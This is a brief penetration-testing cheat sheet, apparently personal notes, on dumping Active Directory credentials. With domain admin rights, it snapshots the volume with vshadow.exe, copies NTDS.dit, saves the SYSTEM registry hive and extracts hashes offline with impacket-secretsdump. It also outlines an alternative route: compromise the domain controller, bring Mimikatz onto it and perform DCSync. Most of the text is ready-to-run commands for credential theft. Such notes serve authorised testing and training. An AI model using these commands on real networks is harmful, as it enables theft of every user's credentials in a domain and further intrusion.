- Shadow Copy, a.k.a. Volume Shadow Service (VSS), is a Microsoft backup technology that allows for creation of snapshots of files and volumes.
- Managed through vshadow.exe.
- As a domain admin one can extract the AD NTDS.dit database file and extract credentials offline.
- As domain admin in elevated Powershell run:
vshadow.exe -nw -p C:
- Copy the extracted file to root folder:
copy <shadow-copy-device-name>\windows\ntds\ntds.dit c:\ntds.dit.bak
- Save the SYSTEM hive from windows registry:
reg.exe save hklm\system c:\system.bak
- Move the two files to Kali and use Impacket to extract credentials:
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
Alternative OpSec Method:
- Compromise DC.
- Get Mimikatz to machine.
- Dump hashes for all users individually through DCSync attacks.